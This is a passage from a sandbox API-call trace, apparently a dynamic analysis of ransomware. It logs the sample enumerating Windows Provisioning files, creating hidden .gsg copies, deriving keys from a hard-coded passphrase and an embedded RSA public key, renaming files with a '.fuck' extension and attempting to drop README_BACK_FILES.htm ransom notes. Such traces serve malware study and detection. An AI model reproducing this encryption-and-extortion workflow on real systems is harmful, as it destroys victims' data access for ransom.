pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.994] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.994] CloseHandle (hObject=0xffffffff) returned 1 [0239.994] CloseHandle (hObject=0xffffffff) returned 1 [0239.994] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0239.994] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0239.995] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.gsg")) returned 0 [0239.996] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.fuck")) returned 0 [0239.996] CryptDestroyHash (hHash=0x28bee18) returned 1 [0239.996] CryptDestroyKey (hKey=0x28be958) returned 1 [0239.996] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.996] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.996] FindClose (in: hFindFile=0x28bf218 | out: hFindFile=0x28bf218) returned 1 [0239.997] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\readme_back_files.htm")) returned 0xffffffff [0239.997] AreFileApisANSI () returned 1 [0239.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0239.997] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.997] GetLastError () returned 0x5 [0239.997] GetLastError () returned 0x5 [0239.997] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.997] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.998] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\readme_back_files.htm")) returned 0xffffffff [0239.998] AreFileApisANSI () returned 1 [0239.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0239.998] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.998] GetLastError () returned 0x5 [0239.998] GetLastError () returned 0x5 [0239.998] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.998] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf018 [0239.999] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.999] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.999] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.999] GetLastError () returned 0x5 [0239.999] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml")) returned 0x20 [0239.999] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0239.999] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.000] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.000] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.001] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.003] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.003] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.003] CryptHashData (hHash=0x28bee18, pbData=0x2857178, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.003] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bee18, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be558) returned 1 [0240.003] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.003] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.003] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d6e50) returned 1 [0240.004] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6e50, dwCertEncodingType=0x1, pInfo=0x28caab8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28caae8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28caaf0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be818) returned 1 [0240.004] CryptEncrypt (in: hKey=0x28be818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.004] CryptEncrypt (in: hKey=0x28be818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7290*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d7290*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.004] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7290, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.004] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.004] CryptEncrypt (in: hKey=0x28be558, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.004] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.004] CloseHandle (hObject=0xffffffff) returned 1 [0240.005] CloseHandle (hObject=0xffffffff) returned 1 [0240.005] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.005] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.005] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg")) returned 0 [0240.006] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.fuck")) returned 0 [0240.006] CryptDestroyHash (hHash=0x28bee18) returned 1 [0240.006] CryptDestroyKey (hKey=0x28be558) returned 1 [0240.006] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.007] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.007] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.007] GetLastError () returned 0x5 [0240.007] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml")) returned 0x20 [0240.007] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.007] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.008] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.008] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.009] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.013] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.013] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.013] CryptHashData (hHash=0x28bf218, pbData=0x2857088, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.013] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be958) returned 1 [0240.013] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.013] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.013] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d7978) returned 1 [0240.014] CryptImportPublicKeyInfo (in: hCryptProv=0x28d7978, dwCertEncodingType=0x1, pInfo=0x28cad28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28cad58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28cad60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be4d8) returned 1 [0240.014] CryptEncrypt (in: hKey=0x28be4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.014] CryptEncrypt (in: hKey=0x28be4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6dc8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d6dc8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.014] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6dc8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.014] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.014] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.014] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.014] CloseHandle (hObject=0xffffffff) returned 1 [0240.014] CloseHandle (hObject=0xffffffff) returned 1 [0240.014] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.015] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.015] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.gsg")) returned 0 [0240.016] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.fuck")) returned 0 [0240.016] CryptDestroyHash (hHash=0x28bf218) returned 1 [0240.016] CryptDestroyKey (hKey=0x28be958) returned 1 [0240.016] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.016] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.016] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bf218 [0240.016] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.016] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.017] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bee18 [0240.017] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.017] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.017] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.017] GetLastError () returned 0x5 [0240.017] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.017] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.018] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.018] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.018] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.019] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d77e0) returned 1 [0240.021] CryptCreateHash (in: hProv=0x28d77e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.021] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.021] CryptHashData (hHash=0x28be558, pbData=0x2857060, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.021] CryptDeriveKey (in: hProv=0x28d77e0, Algid=0x6610, hBaseData=0x28be558, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be958) returned 1 [0240.022] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.022] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.022] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d7208) returned 1 [0240.022] CryptImportPublicKeyInfo (in: hCryptProv=0x28d7208, dwCertEncodingType=0x1, pInfo=0x28ca9e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28caa18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28caa20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be358) returned 1 [0240.022] CryptEncrypt (in: hKey=0x28be358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.022] CryptEncrypt (in: hKey=0x28be358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d75c0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d75c0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.022] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d75c0, 